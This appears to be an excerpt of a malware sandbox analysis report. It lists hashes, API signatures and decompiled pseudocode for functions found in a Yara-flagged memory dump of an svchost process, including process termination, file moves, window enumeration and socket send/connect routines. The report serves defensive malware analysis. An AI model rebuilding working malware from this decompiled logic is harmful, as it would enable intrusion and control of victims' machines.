                                                            • Instruction ID: b2ea6b349ebc8ed8435ecdd6d877e3794279ba03267ffcc2a693a6d5017f03f8
                                                            • Opcode Fuzzy Hash: c3fc35c69c9f4140baecf469e7fb03b97643cd1533679d2c657eb767cf2832fd
                                                            • Instruction Fuzzy Hash: B1213923105A88B1FA369BA5ECAD3EC37A1E745B11F040215C94A436B6CF3FC995D300
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$Read$Virtual$AllocCloseCreateFreeHandlePointerSize
                                                            • String ID:
                                                            • API String ID: 290806221-0
                                                            • Opcode ID: 17210dcd186def013b1cecf1c007fedc50eb9b2a17e3e85a9450abe48f7e7bf3
                                                            • Instruction ID: 5694caae87545b59ddc620d8600ab562ac1096941674ad42b5aadc6dc18a8289
                                                            • Opcode Fuzzy Hash: 17210dcd186def013b1cecf1c007fedc50eb9b2a17e3e85a9450abe48f7e7bf3
                                                            • Instruction Fuzzy Hash: D351B133B0464067EB72CFA9A40D7DE73A2B7C6B91F548115DAD943B99DF3AC8498B00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 65%
                                                            			E0000022B22BAF5552D0(intOrPtr __eax, void* __rcx) {
                                                            				intOrPtr _v24;
                                                            				void* _t6;
                                                            				void* _t9;
                                                            				void* _t12;
                                                            				void* _t13;
                                                            				void* _t14;
                                                            				void* _t15;
                                                            				void* _t17;
                                                            				void* _t18;
                                                            				void* _t19;
                                                            				void* _t20;
                                                            				void* _t21;
                                                            
                                                            				if (r8d - 0x18 < 0) goto 0xaf5552fd;
                                                            				_v24 = __eax;
                                                            				return E0000022B22BAF555620(_t6, _t9, __rcx + 0x258, _t12, _t13, _t14, _t15,  *((intOrPtr*)(__rcx + 0x238)), _t17, _t18, _t19, _t20, _t21);
                                                            			}















                                                            0x22baf5552ed
                                                            0x22baf5552ef
                                                            0x22baf5552fc

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$EnterErrorLastLeave
                                                            • String ID:
                                                            • API String ID: 4082018349-0
                                                            • Opcode ID: 7dcbab2b5b2099de16a57d3f68bd010564f525f5a301c4b7c59ab3c687d6fbf5
                                                            • Instruction ID: ffbfa8a6ca0f8ea8d80e148a5eb79ec7ac5d7ad28214b2bb34b2dd2eae7c4538
                                                            • Opcode Fuzzy Hash: 7dcbab2b5b2099de16a57d3f68bd010564f525f5a301c4b7c59ab3c687d6fbf5
                                                            • Instruction Fuzzy Hash: 6D518173600640EBEB729FA4D44C3DC77A1F7847ACF660521EA0A47A9ADF3AC8858740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 21%
                                                            			E0000022B22BAF534A58(long long __rbx, void* __rdx, void* __rdi, long long _a120, char _a128) {
                                                            				void* _t15;
                                                            				long long _t16;
                                                            				void* _t24;
                                                            				void* _t31;
                                                            
                                                            				_t16 = __rbx;
                                                            				_t24 = __rdx + 1;
                                                            				_pop(_t31);
                                                            				E0000022B22BAF534F40(_t15, __rbx, _t24 + 1);
                                                            				_a128 = 0x70;
                                                            				_a120 = _t16;
                                                            				lstrlenW(??);
                                                            				MoveFileW(??, ??);
                                                            				r9b = 0x3f;
                                                            				_a128 = 0x72;
                                                            				r8d = 1;
                                                            				return E0000022B22BAF531FF0( *((intOrPtr*)(_t31 + 8)),  &_a128);
                                                            			}







                                                            0x22baf534a58
                                                            0x22baf534a58
                                                            0x22baf534a62
                                                            0x22baf534a6b
                                                            0x22baf534a70
                                                            0x22baf534a77
                                                            0x22baf534a83
                                                            0x22baf534a96
                                                            0x22baf534aa5
                                                            0x22baf534aa8
                                                            0x22baf534aad
                                                            0x22baf534ac2

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 5cc38395d3643523402dcea583c21afcc8ccce1aa86f82035545f58b7070c366
                                                            • Instruction ID: b77a70ee4fc2e1cbaf256c7df3c1eadbcf47a9abcf345534e329feafa12a5b4f
                                                            • Opcode Fuzzy Hash: 5cc38395d3643523402dcea583c21afcc8ccce1aa86f82035545f58b7070c366
                                                            • Instruction Fuzzy Hash: 7541F333304681A6EA329BA9B92C39A73A1F784BE4F145711DF5A47B96DF39C441CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 43%
                                                            			E0000022B22BAF550900(intOrPtr* __rcx, void* __rdx, long long __rsi, long long _a32, long long _a40, signed short _a48) {
                                                            				signed int _v56;
                                                            				char _v88;
                                                            				char _v120;
                                                            				void* _v128;
                                                            				void* _v136;
                                                            				void* __rbx;
                                                            				void* __rbp;
                                                            				long _t48;
                                                            				long _t50;
                                                            				void* _t57;
                                                            				void* _t62;
                                                            				void* _t64;
                                                            				signed long long _t77;
                                                            				long long _t83;
                                                            				void* _t84;
                                                            				intOrPtr* _t102;
                                                            				void* _t111;
                                                            
                                                            				_t103 = __rsi;
                                                            				_t77 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_v56 = _t77 ^  &_v128;
                                                            				r14d = r8w & 0xffffffff;
                                                            				_t102 = __rcx;
                                                            				if ( *((intOrPtr*)( *__rcx + 0x160))() == 0) goto 0xaf550ae1;
                                                            				if (E0000022B22BAF550B90( *((intOrPtr*)( *__rcx + 0x160))(), _t84, __rcx, __rdx) == 0) goto 0xaf550ae1;
                                                            				_a32 = __rsi;
                                                            				 *((intOrPtr*)( *__rcx + 0x168))();
                                                            				 *((intOrPtr*)(__rcx + 0x18)) = 1;
                                                            				_v128 =  &_v88;
                                                            				r9d = r14w & 0xffffffff;
                                                            				_v136 = _a40;
                                                            				 *((long long*)(__rcx + 0x1c)) = 5;
                                                            				 *((intOrPtr*)(__rcx + 0x24)) = 1;
                                                            				_v120 = 0;
                                                            				_v88 = 0;
                                                            				if (E0000022B22BAF550CD0(_t57, _t64, E0000022B22BAF550B90( *((intOrPtr*)( *__rcx + 0x160))(), _t84, __rcx, __rdx), _t84, __rcx, __rdx, __rsi, __rdx,  &_v120, _t111) == 0) goto 0xaf550a95;
                                                            				r9d = _a48 & 0x0000ffff;
                                                            				if (E0000022B22BAF550DF0(_t102,  &_v88,  &_v120) == 0) goto 0xaf550a86;
                                                            				SetLastError(??);
                                                            				if ( *((intOrPtr*)( *_t102 + 0xf0))() == 2) goto 0xaf550a6d;
                                                            				r8d = r9d;
                                                            				if (E0000022B22BAF550F10(_t43, _t84, _t102,  &_v120, _t103) == 0) goto 0xaf550a5e;
                                                            				_t83 = _t102 + 0x60;
                                                            				_v128 = _t83;
                                                            				_v136 = 0;
                                                            				E0000022B22BAF564DA4(0, 0, _t83, _t84, _t102, _t103, 0xaf551060, _t102);
                                                            				 *((long long*)(_t102 + 0x58)) = _t83;
                                                            				if (_t83 == 0) goto 0xaf550a50;
                                                            				ResetEvent(??);
                                                            				goto 0xaf550ae3;
                                                            				 *((intOrPtr*)(_t102 + 0x64)) = 8;
                                                            				goto 0xaf550aa4;
                                                            				__imp__#111();
                                                            				 *((intOrPtr*)(_t102 + 0x64)) = 0xb;
                                                            				goto 0xaf550aa2;
                                                            				_t48 = GetLastError();
                                                            				 *((intOrPtr*)(_t102 + 0x64)) = 5;
                                                            				_t49 =  ==  ? 0x4c7 : _t48;
                                                            				goto 0xaf550aa2;
                                                            				__imp__#111();
                                                            				 *((intOrPtr*)(_t102 + 0x64)) = 4;
                                                            				goto 0xaf550aa2;
                                                            				__imp__#111();
                                                            				 *((intOrPtr*)(_t102 + 0x64)) = 3;
                                                            				_t62 =  ==  ? 0x4c7 : _t48;
                                                            				SetLastError(??);
                                                            				 *((intOrPtr*)(_t102 + 0x18)) = 1;
                                                            				 *((long long*)(_t102 + 0x1c)) = 5;
                                                            				 *((intOrPtr*)(_t102 + 0x24)) = 1;
                                                            				_t50 = GetLastError();
                                                            				 *((intOrPtr*)( *_t102 + 8))();
                                                            				SetLastError(??);
                                                            				goto 0xaf550ae3;
                                                            				return E0000022B22BAF55A7C0(_t50, _t83, _v56 ^  &_v128);
                                                            			}




















                                                            0x22baf550900
                                                            0x22baf55090f
                                                            0x22baf550919
                                                            0x22baf55092c
                                                            0x22baf550933
                                                            0x22baf55093e
                                                            0x22baf55094e
                                                            0x22baf55095a
                                                            0x22baf550962
                                                            0x22baf55096d
                                                            0x22baf550976
                                                            0x22baf55097b
                                                            0x22baf55097f
                                                            0x22baf550989
                                                            0x22baf550994
                                                            0x22baf55099e
                                                            0x22baf5509a3
                                                            0x22baf5509af
                                                            0x22baf5509b5
                                                            0x22baf5509d2
                                                            0x22baf5509da
                                                            0x22baf5509f3
                                                            0x22baf5509f5
                                                            0x22baf550a07
                                                            0x22baf550a09
                                                            0x22baf550a10
                                                            0x22baf550a1e
                                                            0x22baf550a24
                                                            0x22baf550a29
                                                            0x22baf550a30
                                                            0x22baf550a3b
                                                            0x22baf550a4b
                                                            0x22baf550a50
                                                            0x22baf550a5c
                                                            0x22baf550a5e
                                                            0x22baf550a64
                                                            0x22baf550a6b
                                                            0x22baf550a6d
                                                            0x22baf550a78
                                                            0x22baf550a81
                                                            0x22baf550a84
                                                            0x22baf550a86
                                                            0x22baf550a8c
                                                            0x22baf550a93
                                                            0x22baf550a95
                                                            0x22baf550a9b
                                                            0x22baf550aa2
                                                            0x22baf550aa4
                                                            0x22baf550aaa
                                                            0x22baf550aad
                                                            0x22baf550ab5
                                                            0x22baf550abc
                                                            0x22baf550aca
                                                            0x22baf550acf
                                                            0x22baf550adf
                                                            0x22baf550afe

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$Event$ResetSelectSwitchThread_invalid_parameter_noinfobindconnecthtons
                                                            • String ID:
                                                            • API String ID: 2826083042-0
                                                            • Opcode ID: 0815b310f8f87fd9cf73c5e4f544e1cd70299ccf9e0ad2642e60bb66e9ac231a
                                                            • Instruction ID: d6fe6afee94c7343af5e50a2214b243c593bd2374017b4c5c383c2a99c7f35b4
                                                            • Opcode Fuzzy Hash: 0815b310f8f87fd9cf73c5e4f544e1cd70299ccf9e0ad2642e60bb66e9ac231a
                                                            • Instruction Fuzzy Hash: E6517F33215B81A2EB758FA1EA1C39E77A0FB48B84F004425DF4A43B96DF7AC469C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 44%
                                                            			E0000022B22BAF552150(void* __ecx, intOrPtr* __rcx, void* __rdx, long long __rsi, long long _a32, long long _a40, signed short _a48) {
                                                            				signed int _v56;
                                                            				char _v88;
                                                            				char _v120;
                                                            				void* _v128;
                                                            				void* _v136;
                                                            				void* __rbx;
                                                            				void* __rbp;
                                                            				long _t48;
                                                            				long _t50;
                                                            				void* _t57;
                                                            				void* _t62;
                                                            				void* _t64;
                                                            				signed long long _t77;
                                                            				long long _t83;
                                                            				void* _t84;
                                                            				intOrPtr* _t102;
                                                            				void* _t111;
                                                            
                                                            				_t103 = __rsi;
                                                            				_t57 = __ecx;
                                                            				_t77 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_v56 = _t77 ^  &_v128;
                                                            				r14d = r8w & 0xffffffff;
                                                            				_t102 = __rcx;
                                                            				if ( *((intOrPtr*)( *__rcx + 0x160))() == 0) goto 0xaf552331;
                                                            				if (E0000022B22BAF550B90( *((intOrPtr*)( *__rcx + 0x160))(), _t84, __rcx, __rdx) == 0) goto 0xaf552331;
                                                            				_a32 = __rsi;
                                                            				 *((intOrPtr*)( *__rcx + 0x168))();
                                                            				 *((intOrPtr*)(__rcx + 0x18)) = 1;
                                                            				_v128 =  &_v88;
                                                            				r9d = r14w & 0xffffffff;
                                                            				_v136 = _a40;
                                                            				 *((long long*)(__rcx + 0x1c)) = 5;
                                                            				 *((intOrPtr*)(__rcx + 0x24)) = 1;
                                                            				_v120 = 0;
                                                            				_v88 = 0;
                                                            				if (E0000022B22BAF5523B0(_t57, _t64, E0000022B22BAF550B90( *((intOrPtr*)( *__rcx + 0x160))(), _t84, __rcx, __rdx), _t84, __rcx, __rdx, __rsi, __rdx,  &_v120, _t111) == 0) goto 0xaf5522e5;
                                                            				r9d = _a48 & 0x0000ffff;
                                                            				if (E0000022B22BAF550DF0(_t102,  &_v88,  &_v120) == 0) goto 0xaf5522d6;
                                                            				SetLastError(??);
                                                            				if ( *((intOrPtr*)( *_t102 + 0xf0))() == 2) goto 0xaf5522bd;
                                                            				r8d = r9d;
                                                            				if (E0000022B22BAF5524F0(_t43, _t84, _t102,  &_v120) == 0) goto 0xaf5522ae;
                                                            				_t83 = _t102 + 0x60;
                                                            				_v128 = _t83;
                                                            				_v136 = 0;
                                                            				E0000022B22BAF564DA4(0, 0, _t83, _t84, _t102, _t103, E0000022B22BAF552600, _t102);
                                                            				 *((long long*)(_t102 + 0x58)) = _t83;
                                                            				if (_t83 == 0) goto 0xaf5522a0;
                                                            				ResetEvent(??);
                                                            				goto 0xaf552333;
                                                            				 *((intOrPtr*)(_t102 + 0x64)) = 8;
                                                            				goto 0xaf5522f4;
                                                            				__imp__#111();
                                                            				 *((intOrPtr*)(_t102 + 0x64)) = 0xb;
                                                            				goto 0xaf5522f2;
                                                            				_t48 = GetLastError();
                                                            				 *((intOrPtr*)(_t102 + 0x64)) = 5;
                                                            				_t49 =  ==  ? 0x4c7 : _t48;
                                                            				goto 0xaf5522f2;
                                                            				__imp__#111();
                                                            				 *((intOrPtr*)(_t102 + 0x64)) = 4;
                                                            				goto 0xaf5522f2;
                                                            				__imp__#111();
                                                            				 *((intOrPtr*)(_t102 + 0x64)) = 3;
                                                            				_t62 =  ==  ? 0x4c7 : _t48;
                                                            				SetLastError(??);
                                                            				 *((intOrPtr*)(_t102 + 0x18)) = 1;
                                                            				 *((long long*)(_t102 + 0x1c)) = 5;
                                                            				 *((intOrPtr*)(_t102 + 0x24)) = 1;
                                                            				_t50 = GetLastError();
                                                            				 *((intOrPtr*)( *_t102 + 8))();
                                                            				SetLastError(??);
                                                            				goto 0xaf552333;
                                                            				return E0000022B22BAF55A7C0(_t50, _t83, _v56 ^  &_v128);
                                                            			}




















                                                            0x22baf552150
                                                            0x22baf552150
                                                            0x22baf55215f
                                                            0x22baf552169
                                                            0x22baf55217c
                                                            0x22baf552183
                                                            0x22baf55218e
                                                            0x22baf55219e
                                                            0x22baf5521aa
                                                            0x22baf5521b2
                                                            0x22baf5521bd
                                                            0x22baf5521c6
                                                            0x22baf5521cb
                                                            0x22baf5521cf
                                                            0x22baf5521d9
                                                            0x22baf5521e4
                                                            0x22baf5521ee
                                                            0x22baf5521f3
                                                            0x22baf5521ff
                                                            0x22baf552205
                                                            0x22baf552222
                                                            0x22baf55222a
                                                            0x22baf552243
                                                            0x22baf552245
                                                            0x22baf552257
                                                            0x22baf552259
                                                            0x22baf552260
                                                            0x22baf55226e
                                                            0x22baf552274
                                                            0x22baf552279
                                                            0x22baf552280
                                                            0x22baf55228b
                                                            0x22baf55229b
                                                            0x22baf5522a0
                                                            0x22baf5522ac
                                                            0x22baf5522ae
                                                            0x22baf5522b4
                                                            0x22baf5522bb
                                                            0x22baf5522bd
                                                            0x22baf5522c8
                                                            0x22baf5522d1
                                                            0x22baf5522d4
                                                            0x22baf5522d6
                                                            0x22baf5522dc
                                                            0x22baf5522e3
                                                            0x22baf5522e5
                                                            0x22baf5522eb
                                                            0x22baf5522f2
                                                            0x22baf5522f4
                                                            0x22baf5522fa
                                                            0x22baf5522fd
                                                            0x22baf552305
                                                            0x22baf55230c
                                                            0x22baf55231a
                                                            0x22baf55231f
                                                            0x22baf55232f
                                                            0x22baf55234e

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$Event$ResetSelectSwitchThread_invalid_parameter_noinfobindconnecthtons
                                                            • String ID:
                                                            • API String ID: 2826083042-0
                                                            • Opcode ID: 684fbcd5a7661f2e56074939b602afa10721d097a13773435bc64beb91d93878
                                                            • Instruction ID: 6117f302e106ac1a86f9c5d8bda8b89fce8bc6c30ad5616d7db0463e27b66eba
                                                            • Opcode Fuzzy Hash: 684fbcd5a7661f2e56074939b602afa10721d097a13773435bc64beb91d93878
                                                            • Instruction Fuzzy Hash: 9A517F37215B40A2EB758FA1EA0C3AE73A0FB88B85F004025DF4943B96DF7AC069C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave$ErrorFreeHeapLast$send
                                                            • String ID:
                                                            • API String ID: 3617958714-0
                                                            • Opcode ID: ca3059caf0ab343c84aa3e129b0c3e82e832670cd34c6748d635095cf72d42f5
                                                            • Instruction ID: 3fe6bd48d449329be815873bef15be0e8a189e029ce0a19b68f1b3eb4e7d28c4
                                                            • Opcode Fuzzy Hash: ca3059caf0ab343c84aa3e129b0c3e82e832670cd34c6748d635095cf72d42f5
                                                            • Instruction Fuzzy Hash: 8B414733600A40A6EB768BA6E54C3DEB7B0F789B94F004415CB9E43B96EF3AD5958340
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 26%
                                                            			E0000022B22BAF5477C0(void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rbp, long long _a8, long long _a16, void* _a32) {
                                                            				void* __rdi;
                                                            				void* __rsi;
                                                            				int _t16;
                                                            				int _t20;
                                                            				void* _t23;
                                                            				void* _t36;
                                                            				char* _t37;
                                                            				void* _t57;
                                                            				void* _t58;
                                                            				void* _t65;
                                                            				void* _t66;
                                                            				void* _t67;
                                                            
                                                            				_t36 = __rax;
                                                            				_a8 = __rbx;
                                                            				_a16 = __rbp;
                                                            				_t67 = __rcx;
                                                            				if (r8d == 0) goto 0xaf547811;
                                                            				r8d =  *(_t57 + __rdx);
                                                            				OpenProcess(??, ??, ??);
                                                            				TerminateProcess(??, ??);
                                                            				CloseHandle(??);
                                                            				if (4 - r8d < 0) goto 0xaf5477e2;
                                                            				Sleep(??);
                                                            				E0000022B22BAF548150(_t23, r8d, __rax, __rdx, _t57, _t58, _t65, _t66);
                                                            				if (_t36 == 0) goto 0xaf54784d;
                                                            				_t16 = LocalSize(??);
                                                            				r9b = 0x3f;
                                                            				r8d = _t16;
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)(_t67 + 8)), _t36);
                                                            				LocalFree(??);
                                                            				_a32 = 0;
                                                            				EnumWindows(??, ??);
                                                            				_t37 = _a32;
                                                            				if (_t37 == 0) goto 0xaf5478a3;
                                                            				 *_t37 = 0x82;
                                                            				if (_a32 == 0) goto 0xaf5478a3;
                                                            				_t20 = LocalSize(??);
                                                            				r9b = 0x3f;
                                                            				r8d = _t20;
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)(_t67 + 8)), _a32);
                                                            				return LocalFree(??);
                                                            			}















                                                            0x22baf5477c0
                                                            0x22baf5477c0
                                                            0x22baf5477c5
                                                            0x22baf5477da
                                                            0x22baf5477e0
                                                            0x22baf5477e2
                                                            0x22baf5477ed
                                                            0x22baf5477fb
                                                            0x22baf547804
                                                            0x22baf54780f
                                                            0x22baf547816
                                                            0x22baf54781c
                                                            0x22baf547827
                                                            0x22baf54782c
                                                            0x22baf547836
                                                            0x22baf547839
                                                            0x22baf54783f
                                                            0x22baf547847
                                                            0x22baf547852
                                                            0x22baf547862
                                                            0x22baf547868
                                                            0x22baf547870
                                                            0x22baf547872
                                                            0x22baf54787d
                                                            0x22baf547882
                                                            0x22baf54788c
                                                            0x22baf54788f
                                                            0x22baf547895
                                                            0x22baf5478b5

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$FreeProcessSize$CloseEnumHandleOpenSleepTerminateWindows
                                                            • String ID:
                                                            • API String ID: 1695776769-0
                                                            • Opcode ID: 539b729410ae2bec23191c531da1d5be6d64cb916dcd22b47a22f34e3bf6bfcf
                                                            • Instruction ID: a2e3ef14b5ceeac73126cc7d4f60e70632041110da2e7908444dc8cf405c0f39
                                                            • Opcode Fuzzy Hash: 539b729410ae2bec23191c531da1d5be6d64cb916dcd22b47a22f34e3bf6bfcf
                                                            • Instruction Fuzzy Hash: ED219033B10B50A2EE26AF96F81C7D97792AB89BD1F0944249E4A07766DF39C041C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 30%
                                                            			E0000022B22BAF5454C0(long long __rbx, long long* __rcx, long long _a8) {
                                                            				int _t30;
                                                            				long long* _t37;
                                                            				void* _t56;
                                                            
                                                            				_a8 = __rbx;
                                                            				 *__rcx = 0xaf589380;
                                                            				_t37 = __rcx;
                                                            				ReleaseDC(??, ??);
                                                            				DeleteDC(??);
                                                            				DeleteDC(??);
                                                            				DeleteDC(??);
                                                            				DeleteDC(??);
                                                            				DeleteObject(??);
                                                            				DeleteObject(??);
                                                            				DeleteObject(??);
                                                            				if ( *((intOrPtr*)(__rcx + 0x18)) == 0) goto 0xaf545542;
                                                            				E0000022B22BAF55A7E4(0xaf589380,  *((intOrPtr*)(__rcx + 0x18)));
                                                            				E0000022B22BAF55A7E4(0xaf589380,  *((intOrPtr*)(_t37 + 0x90)));
                                                            				E0000022B22BAF55A7E4(0xaf589380,  *((intOrPtr*)(_t37 + 0x88)));
                                                            				E0000022B22BAF55A7E4(0xaf589380,  *((intOrPtr*)(_t37 + 0x98)));
                                                            				 *((long long*)(_t37 + 0xc8)) = 0xaf589350;
                                                            				_t30 = DestroyCursor(??);
                                                            				if (_t56 - 1 != 0) goto 0xaf545580;
                                                            				return _t30;
                                                            			}






                                                            0x22baf5454c0
                                                            0x22baf5454d5
                                                            0x22baf5454d8
                                                            0x22baf5454e2
                                                            0x22baf5454ec
                                                            0x22baf5454f6
                                                            0x22baf545500
                                                            0x22baf54550d
                                                            0x22baf545517
                                                            0x22baf545521
                                                            0x22baf54552e
                                                            0x22baf54553b
                                                            0x22baf54553d
                                                            0x22baf545549
                                                            0x22baf545555
                                                            0x22baf545561
                                                            0x22baf545572
                                                            0x22baf545583
                                                            0x22baf545591
                                                            0x22baf54559d

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Delete$Object$CursorDestroyRelease
                                                            • String ID:
                                                            • API String ID: 1665608007-0
                                                            • Opcode ID: fd3f2206122930ae594cf7d479ca9f8b55fce53085fe4175d269b5f9c2402e21
                                                            • Instruction ID: ae32690824a280556f01373391ce255552cd431980cc8bf920c88cf684e34443
                                                            • Opcode Fuzzy Hash: fd3f2206122930ae594cf7d479ca9f8b55fce53085fe4175d269b5f9c2402e21
                                                            • Instruction Fuzzy Hash: C3217537611984A1EF52AFB5E89D3EC3361F784F99F044422DE0E4766ADF2AC84AC350
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 75%
                                                            			E0000022B22BAF5658D0(void* __edx, signed short* __rax, long long __rbx, intOrPtr* __rdx, long long __rsi, long long __rbp, void* __r8, long long _a8, intOrPtr _a16, long long _a24, long long _a32) {
                                                            				void* _v40;
                                                            				void* _v48;
                                                            				intOrPtr _v56;
                                                            				void* _v80;
                                                            				intOrPtr _v84;
                                                            				intOrPtr _v88;
                                                            				intOrPtr _v92;
                                                            				intOrPtr _v96;
                                                            				intOrPtr _v100;
                                                            				intOrPtr _v104;
                                                            				intOrPtr _v108;
                                                            				intOrPtr _v112;
                                                            				intOrPtr _v116;
                                                            				intOrPtr _v120;
                                                            				intOrPtr _v124;
                                                            				intOrPtr _v128;
                                                            				intOrPtr _v132;
                                                            				intOrPtr _v136;
                                                            				intOrPtr _v140;
                                                            				intOrPtr _v144;
                                                            				intOrPtr _v148;
                                                            				intOrPtr _v152;
                                                            				intOrPtr _v156;
                                                            				intOrPtr _v160;
                                                            				intOrPtr _v164;
                                                            				intOrPtr _v168;
                                                            				void* _t133;
                                                            				void* _t165;
                                                            				void* _t189;
                                                            				void* _t192;
                                                            				signed short _t194;
                                                            				signed short _t195;
                                                            				signed short _t196;
                                                            				signed int _t197;
                                                            				signed int _t220;
                                                            				void* _t329;
                                                            				signed short* _t348;
                                                            				signed short* _t350;
                                                            				signed long long _t352;
                                                            				signed short* _t354;
                                                            				signed short* _t355;
                                                            				signed short* _t357;
                                                            				intOrPtr* _t358;
                                                            				long long _t366;
                                                            				long long* _t368;
                                                            				signed short* _t370;
                                                            				signed short* _t371;
                                                            				long long* _t374;
                                                            				long long* _t375;
                                                            				long long* _t379;
                                                            				long long* _t381;
                                                            				signed short** _t382;
                                                            				long long _t383;
                                                            				void* _t390;
                                                            				void* _t396;
                                                            
                                                            				_t390 = __r8;
                                                            				_t383 = __rsi;
                                                            				_t366 = __rbx;
                                                            				_a8 = __rbx;
                                                            				_a24 = __rbp;
                                                            				_a32 = __rsi;
                                                            				r13d = 0;
                                                            				sil = r9b;
                                                            				r15d = r8d;
                                                            				_t382 = __rdx;
                                                            				if ( *__rdx != _t396) goto 0xaf565926;
                                                            				_t133 = E0000022B22BAF567054(__rax);
                                                            				 *__rax = 0x16;
                                                            				E0000022B22BAF564328(_t133);
                                                            				_t368 =  *((intOrPtr*)(__rdx + 8));
                                                            				if (_t368 == 0) goto 0xaf56591f;
                                                            				 *_t368 =  *__rdx;
                                                            				goto 0xaf566067;
                                                            				if (r8d == 0) goto 0xaf565934;
                                                            				_t5 = _t390 - 2; // 0x8
                                                            				if (_t5 - 0x22 > 0) goto 0xaf565900;
                                                            				_t379 = _t368;
                                                            				E0000022B22BAF56440C( *__rdx, __rbx,  &_v80, _t379);
                                                            				_v48 =  *_t382;
                                                            				goto 0xaf56596a;
                                                            				_t348 =  *_t382;
                                                            				_t194 =  *_t348 & 0x0000ffff;
                                                            				 *_t382 =  &(_t348[1]);
                                                            				if (E0000022B22BAF570338(_t194 & 0x0000ffff, 8, _t366,  &_v80) != 0) goto 0xaf565960;
                                                            				bpl = sil != 0;
                                                            				if (_t194 != 0x2d) goto 0xaf565990;
                                                            				goto 0xaf565996;
                                                            				if (_t194 != 0x2b) goto 0xaf5659a3;
                                                            				_t350 =  *_t382;
                                                            				_t195 =  *_t350 & 0x0000ffff;
                                                            				 *_t382 =  &(_t350[1]);
                                                            				_v84 = 0x66a;
                                                            				_a16 = 0xaf0;
                                                            				_v120 = 0xb66;
                                                            				_v160 = 0xb70;
                                                            				r11d = 0xff10;
                                                            				_v96 = 0xc66;
                                                            				_t14 = _t383 - 0x80; // 0x9e6
                                                            				r10d = _t14;
                                                            				_v152 = 0xc70;
                                                            				_v112 = 0xce6;
                                                            				r8d = 0x6f0;
                                                            				_v144 = 0xcf0;
                                                            				r9d = 0x966;
                                                            				_v88 = 0xd66;
                                                            				_v136 = 0xd70;
                                                            				_v104 = 0xe50;
                                                            				_v128 = 0xe5a;
                                                            				_v92 = 0xed0;
                                                            				_v168 = 0xeda;
                                                            				_v164 = 0xf20;
                                                            				_v156 = 0xf2a;
                                                            				_v148 = 0x1040;
                                                            				_v140 = 0x104a;
                                                            				_v132 = 0x17e0;
                                                            				_v124 = 0x17ea;
                                                            				_v116 = 0x1810;
                                                            				_v108 = 0x181a;
                                                            				_v100 = 0xff1a;
                                                            				if ((r15d & 0xffffffef) != 0) goto 0xaf565d3a;
                                                            				if (_t195 - 0x30 < 0) goto 0xaf565c60;
                                                            				if (_t195 - 0x3a >= 0) goto 0xaf565aae;
                                                            				goto 0xaf565c5b;
                                                            				if (_t195 - r11w >= 0) goto 0xaf565c49;
                                                            				if (_t195 - 0x660 < 0) goto 0xaf565c60;
